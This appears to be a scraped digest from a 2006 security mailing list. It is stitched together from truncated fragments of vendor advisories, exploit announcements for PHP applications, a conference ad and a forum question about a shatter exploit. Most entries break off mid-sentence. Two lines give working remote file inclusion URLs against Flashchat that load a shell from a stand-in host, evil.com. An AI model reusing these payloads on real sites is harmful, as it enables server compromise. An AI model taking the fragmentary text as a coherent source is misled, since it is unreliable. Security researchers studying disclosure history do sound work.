# SoftBB v0.1 = Cross-Site Scripting - XSS Exploit ;
# Discovered By : ThE__LeO[Mor0Ccan Islam DefenDers Team] ;
# Software : SoftBB ;
# Version : 0.1 ;
# Site Of Software : Www.Softbb.Be ;
# Exploit :
Hello everybody HITBSecConf2006 - Malaysia is only 13 days away and we
will be having loads of speakers down to give talks and presentations on
highly interesting topics, so why don't you register now @
http://conference.hitb.org/hitbsecconf2006kl. Come and experience Asia's
Largest Security
===
Ubuntu Security Notice USN-339-1 September 05, 2006
openssl vulnerability
CVE-2006-4339
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
===
Ubuntu Security Notice USN-338-1 September 05, 2006
mysql-dfsg-5.0 vulnerabilities
CVE-2006-4031, CVE-2006-4227
===
A security issue affects the following Ubuntu releases:
New FAQ document about the recently discovered 0-day vulnerability in Microsoft
Word is available.
This vulnerability has been reported especially in Office 2000 on Windows 2000
machines.
Possible other Office versions are affected as well.
This vulnerability is being exploited by Trojan from
Debian Security Advisory DSA 1169-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 5th, 2006
* Kurdish Security Advisory
* Original Advisory :
http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html
* Script : GrapAgenda
* Site : http://www.graphiks.net
* Version : 0.1
* Risk : High
* Class : Remote
* Contact : [EMAIL PROTECTED] and irc.gigachat.net
#SolpotCrew
Community
#
#AlstraSoft Template Seller Remote File Include Vulnerability
#
#Download file : http://www.alstrasoft.com/template.htm
#
[EMAIL PROTECTED] wrote:
-Description---
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
* Kurdish Security Advisory
* Original Adv :
http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html
* Script : AnnonceV
* Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
* Version : 1.1
* Risk : High
* Class : Remote
* Contact : [EMAIL
####
## ©ZIXForum 1.12 = RepId Remote SQL Injection##
## - - - - - - - - - - - - - - - - - - - - - - - - - -
A buffer overflow in variable 'buf' exists due to insufficient validation
of variable 'name' in function tor_resolve line 218 of software at
http://www.monkey.org/~dugsong/dsocks/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [UPDATE] GLSA 200509-09:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
I found that AuditWizard 6.3.2 by Layton Technologies
is leaving the domain administrator password in the
logfiles of machines that it audits if you use the
Remote Audit feature.
I've contacted them but they have yet to produce a
fix. They have acknowledged the problem but according
to their
Qemu 0.8.2 is also affected by this issue, so the POC code can also be used to
detect virtualisation.
Neither bochs nor vmware are affected.
NeXtMaN mc.nadz [at] gmail.com
Here are 2 RFI vulnerabilities in Flashchat I've found:
Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
video here:
rPath Security Advisory: 2006-0163-1
Published: 2006-09-05
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote Deterministic Unauthorized Access
Updated Versions:
openssl=/[EMAIL PROTECTED]:devel//1/0.9.7f-10.3-1
openssl-scripts=/[EMAIL
#=
#in-link =2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit
#
#
#Critical Level :
Easy Address Book Web Server Format String Vulnerability
Software: Easy Address Book Web Server
Version: 1.2
Website: http://www.efssoft.com/
Description:
Easy Address Book Web Server is a Web Address Book software that allows users
to view, search, add, edit, or administer address books
#==
#Dyn CMS = REleased (x_admindir) Remote File Inclusion Exploit
#===
#
By the way, I'm using the progress control shatter exploit by Brett Moore, but
I'm having a problem with
the setHandler (critical address to overwrite) and shellcodeaddr (data space to
inject the code). Probably they are windows dependent. Do you know if there is
the possibility to write a